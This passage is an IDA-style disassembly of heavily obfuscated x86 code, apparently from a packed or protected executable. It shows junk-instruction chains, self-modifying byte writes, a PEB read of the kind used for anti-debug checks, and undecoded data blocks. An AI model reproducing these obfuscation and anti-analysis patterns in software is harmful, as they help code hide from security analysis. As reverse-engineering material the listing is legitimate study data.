		dd 0E90048D2h, 3173h, 1DC1C281h, 0BAE9F0EFh, 38h
		db 0
; ---------------------------------------------------------------------------

locret_48A0C5:				; CODE XREF: _3gijy9nr:loc_48A9EBj
		retn
; ---------------------------------------------------------------------------
		align 4
		mov	eax, [eax]
		xchg	eax, [esp]
		std
		adc	eax, offset dword_45D0C0
		jmp	loc_48C42A
; ---------------------------------------------------------------------------
		dd 410E900h, 0
; ---------------------------------------------------------------------------
		push	ebx
		push	58211A36h
		jmp	loc_48C33F
; ---------------------------------------------------------------------------
		align 4
		db 0
; ---------------------------------------------------------------------------

loc_48A0ED:				; CODE XREF: _3gijy9nr:0048C2C2j
		push	edx
		push	4290506Eh
		pop	edx
		rol	edx, 15h
		push	offset byte_489BD7
		jmp	locret_48B11A
; ---------------------------------------------------------------------------
		push	eax
		mov	eax, ecx
		xchg	eax, [esp]
		push	esi
		push	offset loc_48AE1D
		jmp	locret_48AE1C
; ---------------------------------------------------------------------------
		align 4

loc_48A114:				; CODE XREF: _3gijy9nr:004898D2j
		call	sub_48CDDE
		add	[eax-49h], ch
		mov	ebx, 8158BEE7h
		enter	0FFFFCA28h, 2Eh
		pop	ss
		add	eax, 0AD3D317Ah
		rol	eax, 2
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48A12F:				; CODE XREF: sub_48B609+19C6j
		add	eax, 4B94171Bh
		jmp	loc_48AD1C
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------

loc_48A13B:				; CODE XREF: _3gijy9nr:0048DB4Aj
		jp	near ptr dword_489DB0+14h
		xchg	edx, [esp]
		pop	edx
		xor	edi, 0F7AF697Ah
		add	eax, edi
		pop	edi
		xchg	eax, [esp]
		jmp	loc_48D0A1
; ---------------------------------------------------------------------------
		dw 0F00h
		dd 3E6080h, 2BA8E900h, 0
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
		align 2
		dw 8Bh
		dd 840FC065h, 0C03h, 0FFEFBEE9h, 0B01168FFh, 50E90048h
		dd 31h,	8B50EC8Bh, 240487C3h, 0FFF52FE9h, 0CDE800FFh, 0E900000Ah
		dd 0FFFFE992h
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48A199:				; CODE XREF: sub_48B609:loc_48D7F4j
		push	ecx
		push	edx
		mov	edx, offset loc_48DF35
		jmp	loc_48CAC4
; END OF FUNCTION CHUNK	FOR sub_48B609

; =============== S U B	R O U T	I N E =======================================



sub_48A1A5	proc far		; DATA XREF: _3gijy9nr:0048C7F8o
		mov	byte ptr [ebx],	3
		pop	ebx
		push	edx
		push	0DE611132h
		pop	edx
		jmp	loc_48BE2F
sub_48A1A5	endp

; ---------------------------------------------------------------------------
		align 2
		adc	ebp, edx
		jmp	sub_48A85B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48D1F6

loc_48A1BD:				; CODE XREF: sub_48D1F6-23B2j
		mov	ebp, ecx
		xchg	ebp, [esp+0]
		mov	ecx, offset locret_48B8A1
		jmp	loc_48DA98
; END OF FUNCTION CHUNK	FOR sub_48D1F6
; ---------------------------------------------------------------------------

loc_48A1CC:				; CODE XREF: _3gijy9nr:0048A7E9j
		sub	edx, 68AB9299h
		rol	edx, 1Dh
		add	edx, 37B7628Ah
		call	loc_48BFE4
		add	[edi-16A4DBE4h], al
		mov	ecx, 1Dh
		jmp	loc_48CF17
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48A1F0:				; CODE XREF: _3gijy9nr:00489938j
					; sub_48B609:loc_48BF32j
		push	esi
		push	77FB9252h
		push	edi
		jmp	loc_48C170
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		dd 5EE80000h, 22h
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
		align 2
; START	OF FUNCTION CHUNK FOR sub_48B429

loc_48A206:				; CODE XREF: sub_48B429+15j
		jmp	nullsub_559
; END OF FUNCTION CHUNK	FOR sub_48B429
; ---------------------------------------------------------------------------

loc_48A20B:				; CODE XREF: _3gijy9nr:0048AB4Aj
		jmp	locret_48D1EE
; ---------------------------------------------------------------------------
		xchg	esi, [esp]
		jz	loc_48DB32
		push	esi
		push	4D03E607h
		pop	esi
		push	ebx
		jmp	loc_48CE48
; ---------------------------------------------------------------------------
		align 4
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48A228:				; CODE XREF: sub_48B609:loc_48BFDFj
		pop	eax
		add	eax, ebp
		push	esi
		push	0DDBCD1C4h
		pop	esi
		or	esi, 235B8DD5h
		and	esi, 0F73D3BB0h
		add	esi, 3B40E9EFh
		jmp	loc_48C19F
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		db 2 dup(0), 0E8h
		dd 0FFFFE6BEh, 0DDE90000h, 3Bh
; ---------------------------------------------------------------------------

loc_48A258:				; CODE XREF: _3gijy9nr:00488E18j
		jmp	locret_48C9EC
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48A25F:				; CODE XREF: sub_48B609-174Dj
		pop	ecx
		jz	loc_48BE85

loc_48A266:				; CODE XREF: sub_48B609:loc_489EABj
		call	sub_48D2DE

loc_48A26B:				; CODE XREF: _3gijy9nr:0048C46Aj
		jmp	nullsub_578
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48A272:				; CODE XREF: _3gijy9nr:loc_48B2E7j
		push	esi
		pushf
		push	offset loc_4895FE
		jmp	loc_48DC92
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------

loc_48A27F:				; DATA XREF: sub_48B5AE-15B0o
		push	offset byte_48DF55
		jmp	loc_48DB20

; =============== S U B	R O U T	I N E =======================================



sub_48A289	proc far		; CODE XREF: sub_48B609+5A4j

; FUNCTION CHUNK AT 0048A565 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0048CEFB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048D9BE SIZE 00000021 BYTES

		xchg	esi, [esp+0]
		pop	esi
		push	34A99546h
		xchg	ebp, [esp+0]
		mov	edx, ebp
		pop	ebp
		sub	edx, 0F33E1C1Ch
		jmp	loc_48D9BE
sub_48A289	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		db 8Bh
		dd 9C5E58F0h, 0A9BAD868h, 0C0D15801h, 0FFEE22E9h, 0C30000FFh
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48A2BA:				; CODE XREF: sub_48B609+1E0Aj
		jmp	loc_48D4FA
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		db 56h
		dd 3AFCE8h, 87000000h, 0C65A2414h, 535B8B03h, 48B071BBh
		dd 1A37E900h, 0
; ---------------------------------------------------------------------------
		jmp	loc_48AB01
; ---------------------------------------------------------------------------
		db 2 dup(0), 0E9h
		dd 0E11h
		db 0
; ---------------------------------------------------------------------------

loc_48A2E9:				; CODE XREF: _3gijy9nr:00488846j
		push	offset word_48A75E
		jmp	loc_48DC8D
; ---------------------------------------------------------------------------
		align 4
		dd 938F0F00h, 87000027h, 895A2414h, 0E99C5A02h,	0FFFFF273h
		dd 0CADEF281h, 0F23BBCCEh, 305E95Ah, 0F5030000h, 46C2C681h
		dd 68918E2h, 0AD689C5Eh, 0E9C2901Fh, 322Ch
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48CD0A

loc_48A32C:				; CODE XREF: sub_48CD0A+9j
		add	eax, 0D95D2349h
		mov	eax, [eax]
		popf
		push	eax
		mov	eax, edi
		xchg	eax, [esp+0]

loc_48A33B:				; DATA XREF: sub_48B609:loc_48BCBDo
		sub	ecx, 40h
		out	0FFh, eax
		call	dword ptr [ebx]
		retf
; END OF FUNCTION CHUNK	FOR sub_48CD0A

; =============== S U B	R O U T	I N E =======================================



sub_48A343	proc near		; CODE XREF: _3gijy9nr:0048D5AFp

; FUNCTION CHUNK AT 0048CD45 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0048D1EF SIZE 00000005 BYTES

		xchg	edx, [esp+0]
		pop	edx
		pop	edx
		jmp	loc_48D1EF
sub_48A343	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		db 2 dup(0), 0C6h	; CODE XREF: sub_48D08F-47Aj
; ---------------------------------------------------------------------------
		add	eax, [ebp-7839FCA5h]
		sub	al, 24h
		mov	esi, ebp
		pop	ebp
		mov	eax, [eax]
		jmp	loc_48D480
; ---------------------------------------------------------------------------
		push	offset dword_48C010
		jmp	locret_48B65F
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

locret_48A36E:				; CODE XREF: _3gijy9nr:loc_48B370j
		retn
; ---------------------------------------------------------------------------
		align 10h
		dd 0E5E4E900h, 0FFFFh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48A378:				; CODE XREF: sub_48B609+23j
		jmp	nullsub_552
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		db 5Eh,	0Fh, 84h
		dd 0D75h, 58F64h, 83000000h, 696804C4h,	58F0B821h, 8AD5C081h
					; CODE XREF: _3gijy9nr:loc_48C0F8j
		dd 0C881F195h, 3CA6C0E0h, 0FFED69E9h, 680000FFh, 198DBA8Ah
		dd 8B243C87h, 0C0815FC7h, 85813058h, 0E91AC0C1h, 16DCh
; ---------------------------------------------------------------------------

loc_48A3C0:				; CODE XREF: _3gijy9nr:loc_489EFFj
		call	near ptr dword_48893C+0C3h
		add	cl, ch
		retn
; ---------------------------------------------------------------------------
		dd 0FFFFFDh
		db 0, 33h, 0C5h

; =============== S U B	R O U T	I N E =======================================



sub_48A3CF	proc near		; CODE XREF: sub_48B609:loc_48D613p
		xchg	esi, [esp+0]
		pop	esi
		push	offset dword_48C780
		jmp	nullsub_542
sub_48A3CF	endp


; =============== S U B	R O U T	I N E =======================================



sub_48A3DD	proc near		; CODE XREF: sub_48D1F6+Bp
		xchg	ebx, [esp+0]
		pop	ebx
		add	edx, eax
		push	ecx
		push	0D7622770h
		pop	ecx
		rol	ecx, 0Eh
		jmp	loc_48C6DA
sub_48A3DD	endp

; ---------------------------------------------------------------------------
		dw 8700h
		dd 68572434h, 488B2Ch, 0FFFD92E9h, 240487FFh, 24048758h
		dd 0A7F0058Dh, 68530048h, 0C6AF418Fh, 0EA5DE95Bh, 7C6FFFFh
		dd 0C15E5F87h, 0FE904C6h
		db 0F4h, 2 dup(0FFh)
; ---------------------------------------------------------------------------

loc_48A427:				; CODE XREF: _3gijy9nr:004893C4j
					; _3gijy9nr:loc_489906p
		xchg	edi, [esp]
		xchg	ecx, [esp]
		mov	edi, ecx
		pop	ecx
		call	sub_48DF6B
		add	[edi+685F243Ch], al ; CODE XREF: _3gijy9nr:0048B551p
		idiv	byte ptr [esi-0A16FFB8h]
		and	[eax], al
; ---------------------------------------------------------------------------
		db 0
		db 0
; ---------------------------------------------------------------------------

loc_48A445:				; CODE XREF: _3gijy9nr:loc_48B003j
		mov	byte ptr [eax],	9
		pop	eax
		add	eax, esi
		pop	esi
		mov	eax, [eax]

loc_48A44E:				; DATA XREF: _3gijy9nr:0048B05Co
		dec	edx
		ror	byte ptr [edi],	84h
		sbb	eax, 0E9000009h
		jecxz	short near ptr dword_48A46C
; ---------------------------------------------------------------------------
		db 2 dup(0), 3
		dd 368B58F0h, 2434879Dh, 3A50E8h, 0E68CE900h
dword_48A46C	dd 59E9FFFFh, 0F00000Fh, 1B3E88h, 2D8A0F00h ; CODE XREF: _3gijy9nr:0048A457j
		db 3Bh,	2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48A47F:				; CODE XREF: sub_48B609:loc_48DE75j
		push	offset byte_48CD7B
		jmp	nullsub_570
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		db 2 dup(0), 87h
		dd 0D08B2404h, 0A2BF6858h, 1CE90048h, 0FFFFFFEh, 0FFF2218Dh
		db 0FFh, 13h, 0EEh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48A4A3:				; CODE XREF: sub_48B609:loc_48DB6Fj
		and	esi, 0D96ED9CEh
		test	esi, 8
		jmp	loc_48C507
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		dd 58F08B00h, 8B240C87h, 0CB8B51E9h, 0E9240C87h, 1FB4h
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48A4C9:				; CODE XREF: sub_48B609:loc_48AE16j
		push	edx
		pop	ecx
		push	ebx
		mov	ebx, 4891ACh
		jmp	loc_48BEEF
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		shl	edi, 7
		xchg	eax, [esp]
		pop	eax
		mov	edx, [edx]
		xchg	edx, [esp]
		call	ds:dword_45D0C0	; ExitProcess
		jmp	loc_48B6C6
; ---------------------------------------------------------------------------
		align 2
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48A4EE:				; CODE XREF: sub_48B609:loc_48AA03j
		xchg	edx, [esp+0Ch+var_C]
		jmp	loc_48AE16
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		jg	sub_4896F0
		sbb	ecx, 334F0B6h
		jmp	loc_48DA38
; ---------------------------------------------------------------------------
		xchg	ecx, [edi]
		jmp	sub_489C99
; ---------------------------------------------------------------------------

locret_48A50E:				; CODE XREF: _3gijy9nr:0048C7FDj
		retn
; ---------------------------------------------------------------------------
		align 10h
		dd 0C300h, 2B50E9h
		db 3 dup(0)
; ---------------------------------------------------------------------------

loc_48A51B:				; CODE XREF: _3gijy9nr:0048979Aj
		jmp	loc_489932
; ---------------------------------------------------------------------------
		dd 830F0000h, 2604h, 0DAE9C61Bh, 9, 0FF870F00h,	0F000036h
					; CODE XREF: _3gijy9nr:loc_48A670j
		dd 0CA985h, 1E91E900h, 0
; ---------------------------------------------------------------------------
		mov	ecx, ebp
		xchg	edx, [esp]
		mov	ebp, edx
		pop	edx
		pop	esi
		push	491110EDh
		pop	eax
		add	eax, 99F81A2Fh
		jmp	loc_48B53A
; ---------------------------------------------------------------------------

locret_48A55E:				; CODE XREF: _3gijy9nr:loc_48CE81j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48D391

loc_48A55F:				; CODE XREF: sub_48D391+Dj
		jmp	near ptr dword_48909C+18h
; END OF FUNCTION CHUNK	FOR sub_48D391
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A289

loc_48A565:				; CODE XREF: sub_48A289:loc_48CEFBj
		xor	esi, 0E51C1042h
		cmp	edx, esi
		pop	esi
		jmp	near ptr dword_489454+17h
; END OF FUNCTION CHUNK	FOR sub_48A289
; ---------------------------------------------------------------------------
		pop	ecx
		xor	ecx, 0BB455CAAh
		add	ecx, 0F0C884A0h
		jmp	loc_48B6D0
; ---------------------------------------------------------------------------
		cdq
		shl	eax, 0Eh
		jmp	loc_48D5B6
; ---------------------------------------------------------------------------
		db 0
byte_48A58F	db 8Bh			; DATA XREF: _3gijy9nr:00488E13o
		dd 0DE8B5300h, 0E9241C87h, 0F53h, 0C0C10000h, 0EDC08104h
		dd 6804803Ch, 48A6ABh, 0FFE61FE9h, 810000FFh, 0B85980E3h
		dd 14C3C179h, 48CF9668h, 0C3EE900h, 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_488888

loc_48A5C8:				; CODE XREF: sub_488888:loc_48B362j
		jge	loc_48A676
; END OF FUNCTION CHUNK	FOR sub_488888
; ---------------------------------------------------------------------------
		dw 0
; ---------------------------------------------------------------------------
		jmp	loc_48AD73
; ---------------------------------------------------------------------------
		cdq
		pushf
		xchg	ecx, eax
		pushf
		test	eax, 0E4BA4448h
		jmp	loc_48A670
; ---------------------------------------------------------------------------
		align 2

locret_48A5E6:				; CODE XREF: _3gijy9nr:0048C234j
		retn
; ---------------------------------------------------------------------------
		align 4

loc_48A5E8:				; CODE XREF: _3gijy9nr:0048CDA7j
		jmp	loc_48CA81
; ---------------------------------------------------------------------------
		db 2 dup(0), 0E9h
		dd 0FFFFFAC4h, 1BC3C100h, 0AD51BB53h, 38E90048h, 7, 75F4EE81h
		db 23h,	0B2h
; ---------------------------------------------------------------------------

loc_48A60A:				; CODE XREF: sub_48C3B4:loc_48CCE6p
		xchg	ecx, [esp]
		pop	ecx
		mov	eax, large fs:30h
		call	sub_48C7C0
		add	cl, ch
		xlat
		and	eax, [eax]
; ---------------------------------------------------------------------------
		db 0
		dd 0C30000h
dword_48A624	dd 87D98B53h, 0AB9241Ch, 0E90048C3h, 0FFFFEF6Ch, 58D0000h
					; DATA XREF: sub_489A21+Co
		dd 48CF17h, 0B88189h, 2680000h,	0E90048CFh, 2AF5h, 0C78B0000h
; ---------------------------------------------------------------------------

loc_48A650:				; CODE XREF: _3gijy9nr:00488BACj
		pop	edi
		and	eax, 0C8D31E30h
		rol	eax, 1Ch
		jmp	loc_489471
; ---------------------------------------------------------------------------
		push	offset loc_48ACCA
		jmp	locret_48C947
; ---------------------------------------------------------------------------
		mov	edi, ecx
		jmp	loc_48DDC1
; ---------------------------------------------------------------------------

loc_48A670:				; CODE XREF: _3gijy9nr:0048A5E0j
		ja	near ptr dword_48A520+8
; START	OF FUNCTION CHUNK FOR sub_488888

loc_48A676:				; CODE XREF: sub_488888:loc_48A5C8j
		add	ebx, 31D79E95h
		jmp	loc_48CAAA
; END OF FUNCTION CHUNK	FOR sub_488888
; ---------------------------------------------------------------------------
		align 2
		mov	ebp, ecx
		jmp	loc_48B472
; ---------------------------------------------------------------------------
		align 2
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48A68A:				; CODE XREF: sub_48B609+5AFj
					; sub_48B609+F59j
		pop	eax
		and	eax, 0AB6BBD8Ch
		sub	eax, 0C8277544h
		add	eax, 34F83E86h
		rol	eax, 1Ah
		xor	eax, 294F0BB4h
		jmp	loc_48CF2D
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		push	ebx
		mov	ebx, 489E72h
		jmp	loc_48AD6E
; ---------------------------------------------------------------------------
		test	esi, 83B74474h
		jmp	loc_4896E4
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48A6C3:				; CODE XREF: _3gijy9nr:00488E3Ej
		popf
		xchg	ebx, [esp]
		pop	ebx
		pushf
		call	sub_48D6DF
; ---------------------------------------------------------------------------
		dw 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48A6D0:				; CODE XREF: sub_48B609:loc_48B717j
		push	62CE76C0h
		pop	edx
		or	edx, 0DC11DFC3h
		add	edx, 0D0D131FCh
		jmp	loc_48D457
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		align 4
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48A6E8:				; CODE XREF: sub_48B609:loc_48BE93j
		mov	byte ptr [esi],	0Fh
		pop	esi
		mov	eax, cs
		xor	al, al
		or	eax, eax

loc_48A6F2:				; DATA XREF: _3gijy9nr:00489A38o
		jz	loc_48D07F
		jmp	loc_48D7F4
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
byte_48A6FD	db 0C6h, 3, 89h		; DATA XREF: sub_48B609:loc_48BD70o
		dd 53E6815Bh, 81FA7731h, 0C23F96F6h, 3110E9BFh,	0
; ---------------------------------------------------------------------------

loc_48A714:				; DATA XREF: sub_48D1F6:loc_48CD19o
		mov	byte ptr [ecx],	0C2h
		xchg	ebx, [esp]
		mov	ecx, ebx
		pop	ebx
		pop	edx
		jmp	locret_48B8A1
; ---------------------------------------------------------------------------
		align 4

loc_48A724:				; CODE XREF: _3gijy9nr:loc_48C7DCj
		pop	esi
		or	esi, 0F7336C94h
		rol	esi, 0Bh
		xor	esi, 3C725E83h
		jmp	loc_48AA94
; ---------------------------------------------------------------------------
		db 2 dup(0), 3
		dd 0AC830FC1h, 0E9000008h, 3371h, 0C1030000h

; =============== S U B	R O U T	I N E =======================================



sub_48A74C	proc near		; CODE XREF: _3gijy9nr:loc_48C52Dp

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00489E02 SIZE 0000000B BYTES

		xchg	esi, [esp-4+arg_0]
		pop	esi
		mov	byte ptr [esi],	0F6h
		xchg	edi, [esp+0]
		mov	esi, edi
		jmp	loc_489E02
sub_48A74C	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		align 2
word_48A75E	dw 8B64h		; DATA XREF: _3gijy9nr:loc_48A2E9o
		dd 3005h, 0D08F6800h, 0AAE90048h, 0FFFFF2h

; =============== S U B	R O U T	I N E =======================================



sub_48A770	proc near		; CODE XREF: _3gijy9nr:0048C71Ej

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0048B09A SIZE 0000000F BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		call	near ptr dword_489124+15h
		or	al, ds:byte_48CE69
		mov	byte ptr [eax],	0C3h
		push	esi
		push	6057B86h
		jmp	loc_48B09A
sub_48A770	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		db 2 dup(0), 68h
		dd offset loc_48C401
		dd 1224E9h
		db 0

; =============== S U B	R O U T	I N E =======================================



sub_48A799	proc near		; CODE XREF: _3gijy9nr:loc_48DB85p
		xchg	eax, [esp+0]
		pop	eax
		push	ecx
		push	0DDDAB736h
		pop	ecx
		or	ecx, 1C58CDB3h
		jmp	loc_48CA98
sub_48A799	endp

; ---------------------------------------------------------------------------
		align 10h
		dd 0DC38A0Fh, 0C870000h, 1B685924h, 5E19894Fh, 825FC681h
		dd 0EE81C02Ah, 98E841D9h, 1D30E9h
		db 3 dup(0)
; ---------------------------------------------------------------------------

loc_48A7D3:				; CODE XREF: _3gijy9nr:loc_488F60j
		mov	byte ptr [edi],	0Fh
		xchg	ebp, [esp]
		mov	edi, ebp
		pop	ebp
		push	edx
		push	0C666237Eh
		pop	edx
		xor	edx, 6B505D79h
		jmp	loc_48A1CC
; ---------------------------------------------------------------------------
		align 10h
dword_48A7F0	dd 231F830Fh, 820F0000h, 0FFFFE69Fh, 87FD8B57h,	0B2E9243Ch
					; DATA XREF: _3gijy9nr:loc_488A8Dr
					; _3gijy9nr:0048CA3Aw
		dd 8100002Fh, 0F687D9E2h, 0DF90E8D5h, 0E900FFFFh, 2163h
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_488F35

loc_48A818:				; CODE XREF: sub_488F35+1970j
		jmp	loc_48DCC8
; END OF FUNCTION CHUNK	FOR sub_488F35
; ---------------------------------------------------------------------------
		align 2
		adc	ebx, ebp
		jmp	sub_48D6DF
; ---------------------------------------------------------------------------
		jnp	loc_48C40A
		sbb	edi, ebx
		jmp	loc_48CA5D
; ---------------------------------------------------------------------------
		align 4
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48A834:				; CODE XREF: sub_48B609+2011j
		jb	loc_4896AE
; END OF FUNCTION CHUNK	FOR sub_48B609

; =============== S U B	R O U T	I N E =======================================



sub_48A83A	proc near		; CODE XREF: sub_48AC2D:loc_48D802p
		xchg	ecx, [esp+0]
		pop	ecx
		mov	byte ptr [ebx],	9Ch
		pop	ebx
		call	sub_48B5AE
		jmp	locret_48BEAE
sub_48A83A	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48A84E:				; DATA XREF: sub_48B609+8o
		push	edi
		mov	edi, offset loc_48D0A1
		jmp	loc_48D98D
; ---------------------------------------------------------------------------
		db 2 dup(0)

; =============== S U B	R O U T	I N E =======================================



sub_48A85B	proc near		; CODE XREF: _3gijy9nr:0048A1B8j
					; sub_48B609:loc_48B444p
		xchg	ecx, [esp+0]
		pop	ecx
		mov	byte ptr [esi],	9
		pop	esi
		call	near ptr dword_489974+81h
		add	[ebx+0BC73338h], cl
		clc

loc_48A86F:				; CODE XREF: _3gijy9nr:0048D7EEj
		push	4888C9h
		jmp	nullsub_585
sub_48A85B	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
byte_48A879	db 0E8h, 0B0h, 11h	; DATA XREF: sub_489378+4o
		dd 0E9000000h, 0FFFFF980h
		db 2 dup(0)
; ---------------------------------------------------------------------------

locret_48A886:				; CODE XREF: _3gijy9nr:0048CADAj
		retn
; ---------------------------------------------------------------------------
		align 4
		dd 1AEFE900h
		db 3 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_488F35

loc_48A88F:				; CODE XREF: sub_488F35+26BCj
		mov	byte ptr [edi],	3
		xchg	edx, [esp+0]
		mov	edi, edx
		pop	edx
		pop	eax
		add	eax, 0C1775647h
		sub	eax, 1374C05Fh
		jmp	loc_48A818
; END OF FUNCTION CHUNK	FOR sub_488F35
; ---------------------------------------------------------------------------
		dw 8B0Fh
		dd 0FFFFEC84h, 0FFE98FE9h, 0F98B00FFh

; =============== S U B	R O U T	I N E =======================================



sub_48A8B8	proc near		; CODE XREF: _3gijy9nr:0048D3BCp

; FUNCTION CHUNK AT 0048C57E SIZE 00000005 BYTES

		xchg	esi, [esp+0]
		pop	esi
		push	489129h
		jmp	loc_48C57E
sub_48A8B8	endp

; ---------------------------------------------------------------------------

loc_48A8C6:				; CODE XREF: _3gijy9nr:0048C54Ej
		not	eax
		jmp	loc_48BCD4
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48A8CF:				; CODE XREF: _3gijy9nr:00488859j
		xchg	edi, [esp]
		mov	ecx, edi
		pop	edi
		and	ecx, 20932C65h
		sub	ecx, 0BCEC0B71h
		xor	ecx, 63971C90h
		add	eax, ecx
		push	offset loc_488E12
		jmp	locret_488939
; ---------------------------------------------------------------------------
		align 4

loc_48A8F4:				; CODE XREF: _3gijy9nr:loc_48CF0Bj
		xchg	ebp, [esp]
		call	near ptr dword_488C00+1Ch
		add	[ebx], al
		fsubr	st, st(1)
		mov	[eax], esp
; ---------------------------------------------------------------------------
		dw 0
		dd 0F08B0000h, 11E68158h, 0FCAFC5Eh, 0FFE27E85h
					; CODE XREF: _3gijy9nr:loc_48DD26j
		db 0FFh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48D2DE

loc_48A915:				; CODE XREF: sub_48D2DE+Dj
		jmp	loc_489C61
; END OF FUNCTION CHUNK	FOR sub_48D2DE
; ---------------------------------------------------------------------------
		align 4
		mov	ecx, 0FC75FCC3h
		jmp	loc_48BC0D
; ---------------------------------------------------------------------------
		align 4

; =============== S U B	R O U T	I N E =======================================



sub_48A928	proc near		; CODE XREF: _3gijy9nr:0048D3E9j
		xchg	esi, [esp+0]
		call	sub_4896F0
sub_48A928	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48A930:				; CODE XREF: sub_48B609+F7j
		jmp	loc_48DA6C
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		or	esi, 59683F08h
		push	offset loc_48B84F
		jmp	locret_489DF8
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48A947:				; CODE XREF: _3gijy9nr:0048DB96j
		xchg	ecx, [esp]
		pop	ecx
		push	eax
		push	0BAB0F096h
		pop	eax
		sub	eax, 0C982D722h
		and	eax, 0C4C57BC5h
		jmp	loc_48B670
; ---------------------------------------------------------------------------
		align 4
		db 0, 0C3h, 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48CEEE

loc_48A967:				; CODE XREF: sub_48CEEE+6j
		jmp	loc_489C1E
; END OF FUNCTION CHUNK	FOR sub_48CEEE
; ---------------------------------------------------------------------------
		dd 0AF890F00h, 0E9000030h, 0FFFFE7E5h, 0C300h, 6BEE9h
		dd 81000000h, 0CB2D05FFh, 840E90Ch, 0F000000h, 0FE482h
		dd 0B6E95800h, 31h
		db 0, 0C3h, 0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_571. PRESS KEYPAD	"+" TO EXPAND]
		db 2 dup(0)
word_48A9A2	dw 0EC8Bh		; DATA XREF: sub_48B609+B48o
		dd 0FFF638E8h, 0F0000FFh, 0FFE12885h, 678F0FFFh, 9CFFFFF9h
					; CODE XREF: sub_48B609:loc_48DCFDj
		dd 9EE9CD85h, 17h, 48B32968h, 59DE900h,	0
		dd 0FFF810E8h
; ---------------------------------------------------------------------------
		inc	dword ptr [eax]

loc_48A9D2:				; CODE XREF: _3gijy9nr:004893FFj
		jmp	loc_489BBE
; ---------------------------------------------------------------------------
		align 4
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_488E43

loc_48A9D9:				; CODE XREF: sub_488E43+7j
		jmp	loc_488B12
; END OF FUNCTION CHUNK	FOR sub_488E43
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------

loc_48A9DF:				; CODE XREF: _3gijy9nr:0048D93Ej
		jmp	locret_48B499
; ---------------------------------------------------------------------------
		dd 0FFFFD7E9h
		db 0FFh, 2 dup(0)
; ---------------------------------------------------------------------------

loc_48A9EB:				; CODE XREF: _3gijy9nr:0048D11Dj
		ja	locret_48A0C5
		shl	ebp, 12h
